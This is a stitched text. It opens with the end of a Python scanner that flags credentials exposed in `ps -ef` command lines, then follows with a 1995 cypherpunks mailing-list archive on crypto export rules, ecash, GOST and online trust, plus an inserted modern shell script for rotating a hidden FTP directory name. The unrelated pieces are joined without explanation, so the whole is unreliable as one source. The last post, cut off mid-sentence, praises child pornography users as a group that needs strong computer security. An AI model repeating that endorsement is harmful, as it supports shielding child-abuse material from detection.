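    """Scan `ps -ef` text; return [(pid, uid, findings, redacted_cmd), ...]."""
    hits = []
    for line in ps_text.splitlines():
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) < 8 or not fields[1].isdigit():
            continue  # header or malformed line
        uid, pid, cmd = fields[0], int(fields[1]), fields[7]
        # ps output has already lost shell quoting, so split on whitespace.
        findings, redacted = scan_argv(cmd.split())
        if findings:
            hits.append((pid, uid, findings, " ".join(redacted)))
    return hits


if __name__ == "__main__":
    for pid, uid, findings, cmd in audit_ps(SAMPLE_PS):
        print(f"pid={pid} uid={uid} {','.join(findings)}: {cmd}")
```

The `/nolog` invocation in the sample is not flagged because the credential never appears in argv; the client is expected to read it from standard input or a protected file instead.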




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Fri, 24 Nov 1995 10:35:43 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <m0tInGT-0008xjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


 Jeff Simmons <jsimmons@goblin.punk.net> said...

>Then suppose you hand software to MIT to put on its export-controlled ftp
>site (which would seem to follow your requirements to take reasonable
>precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>wink, wink - BUT you know that it's going to be available on major ftp
>sites in Europe within a few hours anyway.  The intent to export isn't 
>there, but the export occurs anyway.  Is it the intent, or the knowledge
>that's important?
>
>Obviously the intent, or the MIT server would be in jail.
>
>So I demonstrate lack of intent to export, by following MIT's model when I
>set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
>a note from the NSA or somebody to do this?  And if I do need somebody or
>something's 'permission', and they refuse to give it, aren't they using
>ITAR to restrict the distribution domestically?  Do I have any options in
>this case other than to give up?
>
>Or, to bring it down to a practical question, what's stopping Netscape?  How
>does Netscape setting up an 'export controlled' ftp site based on the MIT
>version lead to one of their executives going to jail?
>
>I have the feeling that we're talking about two different things here - the
>law as it's practiced in the courtroom and the law as it's practiced on the
>'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
>won't help much if the government decides to do a Phil Zimmermann on me.
>But I would be interested in your comments.


I very much agree with the direction you appear to be headed in.  It seems
to me that Netscape should have no problem devising some sort of scenario in
which such a program eventually gets onto the nets, but in a way that is
squeaky clean, at least for THEM.  


In addition, why should they even need to write the encryption part of their
software IN the US?  It occurs to me that one way to do this might be to
send one of their programmers to a conveniently-located place, such as
Vancouver BC , Montreal Canada, or a few other nearby places, with a great
deal of fanfare, and tell him to "write some crypto."  He does, and brings
it back into the US with him, leaving a copy of it "outside" the country for
international distribution.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 24 Nov 1995 08:20:44 +0800
To: jsimmons@goblin.punk.net
Subject: Re: Spam the Sign!
Message-ID: <9511240003.AA05004@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>  Or do I need
>a note from the NSA or somebody to do this?

Somebody at DoD, department of trade control.  I posted the address and
phone number of the guy here a couple of days ago -- check the archives.
Call soon, he's leaving early December; expect him to be replaced by
someone clueless.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 04:10:30 +0800
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <9511231639.AA25523@mhv.net>
Message-ID: <Pine.BSD.3.91.951123191604.11385D-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Lynne L. Harrison wrote:

> <snip>
> >I am inclined to agree with Perry in as much as the volume of posts to
> >the cypherpunks list is greatly increased by reposts of news from
> >other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
> >programs, films, books, talks, etc.  While some of the information
> >posted is interesting, and relevant, some others are less relevant,
> >bordering on noise.
> >
> >The proposal: a separate list for current-event reports/news/reposts.
>
	<attila> someone suggested a new list --moderated. My concern, so
circulated, is that whoever (including backups to cover vacations and 
travel) accepts the responsibility must not thrash any of the code posts. 
My suggestion for making the list effective is to always post to c|punks, 
even if you are on the code list which means "cypherpunks" is still the 
same; who ever is doing the moderating then forwards all the code threads 
to "cypherpunks.moderated"  --you get the best of both worlds.
 
> 1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
> People will merely add one more list to their "cc" line.
>
    	<attila> no doubt. for instance, whoever put c|punks on the 
    ACLUNATL@aol.com biweekly list would just hit both and that one cannot
    be unsubscribed except by the original subscriber. however, that one is
    concise -let's hope we do not get hit with "digitaliberty," "VTW" or any
    of the rest of the prolific slammers/day. 

    	the issue as pointed out above is a separate moderated and 
    non-postable list.
 
> 2.  More importantly, I am troubled with the "this is OUR list" attitude
> that some people have expressed.  Yes, it is a pain when there are
> cross-posts that are completely off-topic but, as Adam correctly points out,
> some are interesting and relevant.
>
	<attila>  but is not the charter of the list "cypherpunks write 
    code" an issue. I don't go as far as Perry on irrelevancy (and Perry 
    breaks his own commandment at will --as do I).

>     One of the tenets proposed by those on this list is free speech.  Most
> of us are on more than one list, so I'm assuming that most of us receive
> 100+ messages a day.  It is irritating to read something that's been crossed
> to c|punks that has nothing to do with this list.  However, it only takes a
> few seconds to arrive at that conclusion and trash the post.

	<attila> that may be true, but it is annoying enough that I use
    'procmail' to waste the lists (and Dr. Fred) before they even make the
    message list.  AND, 'procmail' separates all the mailing list into
    separate folders on the way in --I have not read a newsgroup for
   almost a year unless I am looking for something very specific. 

>     The "they are targeting this list" borders almost on paranoia.  While
> some paranoia is healthy :) - it should not lead to the cry to ban posts
> that have been *deemed* to be inappropriate.
>
	<attila>  any one with a political agenda is going to cross post 
    any list which, in their opinion, might be an audience. the ACLU
    post today is obvious --freedom of speech and congressional action to
    effectively shut down the internet, which certainly falls within our 
    mainstream "interests."

>     I find it interesting that those who express that the net should be a
> community where expression is to be encouraged and defended - until the time
> arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
> knocks on one's front door.
> 
	<attila> this is a valid concern. the last figure I saw for lists 
    was 12,000+.  if some of them do not overlap, where did they find
    12,000 topics worthy of a mail list? as I said, procmail takes care of
    the yeoman's portion, but it is not the be all to end all either. I'm
    not at the point of writing an ai based preprocessor which analyzes
    the content of the folders before invoking my mail reader, but how far
    off is that? information may be key to survival, but...

> Regards -
>   Lynne
> 
	<attila> comment to Lynne: that is the key to life as we know it!

> 
> *******************************************************
> Lynne L. Harrison, Esq.   |     "The key to life:
> Poughkeepsie, New York    |      - Get up;
> E-mail:                   |      - Survive;
> lharrison@mhv.net         |      - Go to bed."
> *******************************************************
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 24 Nov 1995 09:13:57 +0800
To: sameer@c2.org
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXZTB0E3XG8WYILG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sameer@c2.org"  "sameer" 16-NOV-1995 19:01:20.75

>From EALLENSMITH:
> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 
----------------
	That's what I said; "non-privacy to the sender" is lack of payee
anonymity. This lack is problematic for me personally in two respects:
	First, there is that, as I have stated, I would like to be a payee at
some point. My likelihood of doing so is decreased if I do not have an
anonymity option.
	Second, services that I might like to utilize are less likely to be
available if the anonymity of the provider is not guaranteed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 24 Nov 1995 04:52:39 +0800
To: cypherpunks@toad.com
Subject: Re: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <Pine.3.89.9511232006.A11987-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Perry E. Metzger wrote:

> Source Code
>           DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
							   ^^
Is that the real A5, or the version that was posted to Usenet some time 
ago ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 00:02:45 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Spam the Sign!
Message-ID: <m0tIpka-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>>  Jeff Simmons <jsimmons@goblin.punk.net> said...
>> 
>> >Then suppose you hand software to MIT to put on its export-controlled ftp
>> >site (which would seem to follow your requirements to take reasonable
>> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>> >wink, wink - BUT you know that it's going to be available on major ftp
>> >sites in Europe within a few hours anyway.  The intent to export isn't 
>> >there, but the export occurs anyway.  Is it the intent, or the knowledge
>> >that's important?
>
>What's important to the government is that the crypto not be exported. 


Actually, that's not true.  What's REALLY important to the government is
that it not be AVAILABLE outside the country, or perhaps even more
accurately, not available anywhere.  Problem is, the government doesn't have
unlimited authority in this area.


>> >Or, to bring it down to a practical question, what's stopping Netscape?  How
>> >does Netscape setting up an 'export controlled' ftp site based on the MIT
>> >version lead to one of their executives going to jail?
>
>Maybe their executives don't want to deal with the possibility of going to
>jail and are staying far from the edge of the law.  Maybe they are too busy
>trying to find some way to make money.
>
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>
>But why would they want to risk this? As squeaky clean as it is, we now
>all know that they know that making it available this way is exporting
>it. 

NO!  The government doesn't even pretend to have authority over non-exported
encryption, and they readily admit this.    And I'm sure they also are
aware that they can't press their luck with an overbroad interpretation of ITAR.

Let's look at REALITY, okay?  Export controls on products have been around
for many decades.  Computers are a classic example.  If merely manufacturing
a product that (if exported to the wrong place) becomes a violation of such
laws/regulations, then practically every computer company that has ever
existed violated ITAR.

Here's the real "problem": Export regulations were intended to MINIMIZE the
number of controlled products "leaking through" the border.  There was never
any illusion that this could be entirely eliminated. So far so good: They
were happy to minimize the number of mainframe computers 1970 (for example)
USSR got.

Software, by its very nature, is infinitely copiable, which means that even
a single export  constitutes a complete failure of the system.  Thus, a
system of regulation that was useful for hardware becomes totally useless
for software.

 
>> In addition, why should they even need to write the encryption part of their
>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>
>This is illegal as well. 

No, it isn't.

>The programmer is exporting the cryptosystem,

No, he isn't.  Exporting a book on encryption, including algorithms, for
example, is entirely LEGAL.  

And I think you're misusing the term, "cryptosystem."  The government may be
attempting to use ITAR to regulate exports of fully-functioning software,
but it apparently cannot touch books containing source code for such
programming.  Thus, "exporting the cryptosystem" is NOT always a violation
of ITAR if your definition of "cryptosystem" is so broad as to include
source-on-paper, and thus your statement is legally irrelevant.  If you
tighten up the term "cryptosystem" to  include only functioning software,
your statement becomes false because said programmer does not need to export
same.

Note that I'm assuming that the programmer GENUINELY writes the software
abroad, as opposed to faking it.   Of course, even "faking it" might be
legal:  If source-on-paper exporting is LEGAL, then taking a copy of an
encryption program outside the country on paper, then scanning it into a
computer and recompiling there should also be legal. 

>and may even be guilty of treason (probably not).  If you really want
>strong crypto, just buy it from one of the hundreds of legitimate
>overseas suppliers.  If you want to export strong crypto Netscape,
>rewrite Netscape outside the US.  It's not that complex a program.

That's not a satisfactory solution.  The goal, I suggest, is to allow
Netscape (or any other manufacturer) to sell a SINGLE product around the
world, without violating (even arguably) ITAR.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 24 Nov 1995 11:00:41 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <9511240239.AA15636@all.net>
MIME-Version: 1.0
Content-Type: text


>  Jeff Simmons <jsimmons@goblin.punk.net> said...
> 
> >Then suppose you hand software to MIT to put on its export-controlled ftp
> >site (which would seem to follow your requirements to take reasonable
> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
> >wink, wink - BUT you know that it's going to be available on major ftp
> >sites in Europe within a few hours anyway.  The intent to export isn't 
> >there, but the export occurs anyway.  Is it the intent, or the knowledge
> >that's important?

What's important to the government is that the crypto not be exported.  If
Netscape did this, the government might try to take them to court to make
an example of them, or might leave them alone to support the information
superhighway, or might refuse to ever buy any Netscape, or whatever.  The
point for Netscape is that none of these are good for the corporation.

> >Or, to bring it down to a practical question, what's stopping Netscape?  How
> >does Netscape setting up an 'export controlled' ftp site based on the MIT
> >version lead to one of their executives going to jail?

Maybe their executives don't want to deal with the possibility of going to
jail and are staying far from the edge of the law.  Maybe they are too busy
trying to find some way to make money.

> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  

But why would they want to risk this? As squeaky clean as it is, we now
all know that they know that making it available this way is exporting
it.  It's also possible that one of the people who took part in it would
turn State's evidence, or that this would result in a loss of
shareholder confidence, or that the people running Netscape support the
government position, or even that they just don't want the controversy.

> In addition, why should they even need to write the encryption part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.

This is illegal as well.  The programmer is exporting the cryptosystem,
and may even be guilty of treason (probably not).  If you really want
strong crypto, just buy it from one of the hundreds of legitimate
overseas suppliers.  If you want to export strong crypto Netscape,
rewrite Netscape outside the US.  It's not that complex a program.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Fri, 24 Nov 1995 12:26:07 +0800
To: cypherpunks@toad.com
Subject: Re: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <Pine.LNX.3.91.951123230420.466B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 23 Nov 1995, Laurent Demailly wrote:

> sameer@c2.org writes:
> [ 'passwd'/'secret' is NEWDIRNAME : ]
>  > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
> [...]
> Hey hey, cool, what a great security ! now can you please send source
> for /usr/local/bin/pseudo-random ? :-)))
> 
I just used the following simple shell script.  Not very secure but does
the trick for the purposes of export controlled directories.

#!/bin/sh
(date; uptime; ps -e; netstat; set) | md5sum
 
- --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

-----END PGP SIGNATURE-----


`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/
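
Added example, not part of the original posts: the directory-rotation script quoted in this thread, with the name drawn from the kernel random device instead of hashing guessable system state such as `date`, `uptime` and `ps -e`. The function names, the directory and state-file arguments, and the use of /dev/urandom are assumptions of this sketch, not code from sameer or Mark M.

```shell
#!/bin/sh
# Added example (not from the thread): rotate the hidden "US-only"
# directory name using kernel randomness. Layout and file names follow the
# script quoted in the thread; function names and arguments are assumptions.

# Print 128 bits from /dev/urandom as 32 lowercase hex characters.
# Unlike `(date; uptime; ps -e; netstat; set) | md5sum`, none of the input
# can be observed or estimated by someone probing the FTP server.
new_token() {
    od -An -N16 -tx1 /dev/urandom | tr -d ' \n'
}

# rotate_dir FTP_DIR STATE_FILE
# Renames FTP_DIR/I_will_not_export_<old> to a fresh token, rewrites
# README.US-only to match, records the new token, and prints it.
rotate_dir() {
    ftp_dir=$1
    state_file=$2

    old=$(cat "$state_file") || return 1
    # The old token is interpolated into a sed expression below, so accept
    # only non-empty hex strings.
    case $old in
        ''|*[!0-9a-f]*) return 1 ;;
    esac

    new=$(new_token) || return 1
    # Refuse to continue on a short read: a truncated token would make the
    # directory name easier to guess.
    [ "${#new}" -eq 32 ] || return 1

    [ -d "$ftp_dir/I_will_not_export_$old" ] || return 1
    mv "$ftp_dir/I_will_not_export_$old" \
       "$ftp_dir/I_will_not_export_$new" || return 1

    # Write the updated README beside the original, then rename it into place.
    tmp="$ftp_dir/README.new.$$"
    sed -e "s/$old/$new/g" "$ftp_dir/README.US-only" > "$tmp" || return 1
    mv "$tmp" "$ftp_dir/README.US-only" || return 1

    # The state file holds the current secret name; restrict it to the owner.
    printf '%s\n' "$new" > "$state_file" || return 1
    chmod 600 "$state_file" || return 1

    printf '%s\n' "$new"
}
```

From cron this would be called as `rotate_dir /u1/ftp/pub/US-only "$HOME/.usonlydir"`, matching the paths in the quoted script.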




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 24 Nov 1995 06:34:21 +0800
To: Corey Bridges <corey@netscape.com>
Subject: Re: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <9511232218.AA19027@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges writes:
 > And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
 > scrolling for the last 3 hours.
Where was the spam coming from?

Btw, the web,... application is *great* it is always nice to (appear)
to interact with the real world ! ('cept that when I tried, the only
thing the camera showed was indeed "Strong Crypto" or "Now", it
wouldn't let pass one of my messages)
It is a very easy target for abuses though...
Very nice job, keep up !

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

bomb domestic disruption Soviet Kennedy Peking Uzi plutonium




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 24 Nov 1995 06:52:24 +0800
To: sameer <sameer@c2.org>
Subject: Re: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <9511232220.AA19031@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org writes:
[ 'passwd'/'secret' is NEWDIRNAME : ]
 > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
[...]
Hey hey, cool, what a great security ! now can you please send source
for /usr/local/bin/pseudo-random ? :-)))

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PGP Clinton ammunition Greenpeace Croatian Kennedy genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 24 Nov 1995 18:18:54 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <Pine.BSD.3.91.951123231858.12363F-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
In its NEWS IN BRIEF summary, 11 22 95 Financial Times 
reports: 
 
   BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
   calling" throughout the European Union was on Tuesday 
   approved by Euro-MPs, to the consternation of direct mar- 
   keting and distance selling organisations.  In a move de- 
   signed to spare people from what MEPs consider to be ir- 
   ritating telephone calls, a key parliamentary committee 
   voted to make prior consent from consumers obligatory 
   before a seller can approach them by telephone. 
 
   The proposed ban also applies to communications by e- 
   mail, raising fears among publishing organisations that 
   the development of the information society in Europe could 
   be damaged. 
 
 
Ban fear, for we have nothing to fear but fear itself. 
 
 
Cordially, 
 
Jim 
 
  
 
NOTE.  The URL of one Financial Times Group website is: 
 
                   http://www.usa.ft.com 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 24 Nov 1995 23:58:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.3.89.9511232304.A31942-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 23 Nov 1995, jim bell wrote:

> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
As long as the programmer's not American. They could contract it to a 
Canadian though. We don't have freeware export restrictions on non-US 
crypto, but I'm none too clear about everything else. All the same why not
contract it to Eric Young or whoever it is who's doing an independent
version of SSL (or whatever it's called) Down Under (was it Australia or 
NZ?) ? I don't see why geography's a problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 24 Nov 1995 13:28:39 +0800
To: ecarp@netcom.com
Subject: establishing trust
Message-ID: <199511240500.AAA07836@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>From khijol!erc@uunet.uu.net Thu Nov 23 16:21 EST 1995
>From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>

..so..why the UUCP style address?

>Subject: Re: crypto for porno users
>To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
>Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
>Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.net
>

>totally different from this "web of trust" I keep hearing about - and that is
>*it*.  Do you trust me any more now than before I started signing my postings?

Actually, in my view, signed postings are the first step.  With those (and
the right S/W (not there yet)), I get to know that a bunch of postings came
from the same person.  I even know who they came from:  the person who
is capable of signing with key 0xXXXXXXXX.

Since the only way I have of getting to know the person is through those
postings, I get to know that person and through that knowledge I decide
whether or not to trust.

And, yes, I can be fooled.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Sat, 25 Nov 1995 00:02:42 +0800
To: cme@clark.net (Carl Ellison)
Subject: Re: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <199511240708.BAA22051@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> >From khijol!erc@uunet.uu.net Thu Nov 23 16:21 EST 1995
> >From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
> 
> ..so..why the UUCP style address?

Because I don't have a real UUCP connection at the moment.  Khijol is 
expected to get back on the net as khijol.org in the next few days.  Just 
trying to get by until then :)

> >Subject: Re: crypto for porno users
> >To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
> >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
> >Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.net
> >
> 
> >totally different from this "web of trust" I keep hearing about - and that is
> >*it*.  Do you trust me any more now than before I started signing my postings?
> 
> Actually, in my view, signed postings are the first step.  With those (and
> the right S/W (not there yet)), I get to know that a bunch of postings came
> from the same person.  I even know who they came from:  the person who
> is capable of signing with key 0xXXXXXXXX.

Yes, but that only establishes that I was the one who wrote the post, not 
that I am to be trusted...

> Since the only way I have of getting to know the person is through those
> postings, I get to know that person and through that knowledge I decide
> whether or not to trust.
> 
> And, yes, I can be fooled.

I've met a fair number of people in person that I've met over the net, and
I'm here to tell you that a lot of people I've met are totally different
in person than they are over the net.  People that I thought I could trust
gave me the willies in person, and I eventually found out that I couldn't
trust them at all.  Get burned a couple of times like that, and you learn
to suspend trust until you really meet someone in person. 

Just my $0.02.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 24 Nov 1995 15:42:49 +0800
To: nyms@sephiroth.org (Nym Servers Mailing List)
Subject: Re: bit quiet in here lately
Message-ID: <199511240728.BAA11266@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 AM 11/24/95 -0500, futplex wrote:
>sameer writes:
>> 	I am working on a spec which myself and others will turn into
>> an internet draft, for placements on the standards track.  It will
>> standardize remailer commands and nymserver commands, and will
>> incorporate payment. Once we get a draft written up it will be posted
>> for review, flames, and criticism.
>
>Great -- I've been toying with working on exactly that since the summer. 
>I never quite convinced myself that a) the general net community would really 
>take a remailer-related i-draft or RFC seriously, or even that b) the
>remailer community would really find a standards document useful. It's
>encouraging to see that some other people also think it's worth writing.
>

Now, if the remailer service-listing operators could agree on a standard
format for their reporting (lag time, feature lists, etc), then it would
simplify maintaining a list of remailers - which would increase the
usability of the remailer system, and help the use and growth of remailers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 24 Nov 1995 11:16:11 +0800
To: cypherpunks@toad.com
Subject: Re: The Mesh and the Net
In-Reply-To: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.951124032121.19699A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, John Young wrote:

> "The Mesh and the Net: Speculations on Armed Conflict in a
> Time of Free Silicon," by Martin C. Libicki, March, 1994. 
> (233kb)
> 
> Available on the Web at:
> 
> <http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>
> 
> NDU is the National Defense University, Libicki's teat.

A very interesting read! The speculations about the future of the
(civilian) Net are amazing, even more so coming from an official
sub-division of the US DoD (?). An excerpt (that could have been
written by a cypherpunk crypto-anarchist philosopher just as well):

   'The information revolution, acting through
 multinational corporations and transnational
 communities, may weaken many powers of the state
 anyway.  Would it be much of an exaggeration to posit
 a nation's expression, not through government, but as
 a local ganglion of the world Net.  That being the
 case, might not the decline of the state coincide with
 the rise of the Net, the newest venue for crime,
 conflict, and chaos?'

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 24 Nov 1995 11:30:11 +0800
To: cypherpunks@toad.com
Subject: GOST for sale
Message-ID: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



According to a short article in a Swedish newspaper (DN)
with the title 'Spy Code of KGB can make computers safe', 
JETICO INC., located in Finland (Tammerfors), introduced
a new crypto system on the world market last week. It's 
based on GOST, the Russian federal standard algorithm.
This product, called BestCrypt, is implemented at least
partly in hardware. Allegedly it uses 'GOST 28147-89',
whatever that stands for.

GOST is probably very secure - a huge keyspace (256 bits) and
KGB would not have left a trapdoor for NSA to take advantage
of, would they?

The newspaper article ends:

'The Finnish entrepreneurs asseverate that their
Russian colleagues have never had anything to do
with the KGB.'

Mats







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 24 Nov 1995 18:18:25 +0800
To: cypherpunks@toad.com
Subject: crypto for porno users
Message-ID: <199511241535.JAA30731@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                   crypto for porno users

   Crypto porno is a wonderful topic for Cypherpunks. Child porno people
are a group that definitely needs the very best in computer security. If
their computer security problems are solved, then everybody's computer
security problems are solved.

               COMPUTER SITE DISK SECURITY

   The SecureDrive 1.4 disk encryptor system solves their computer site
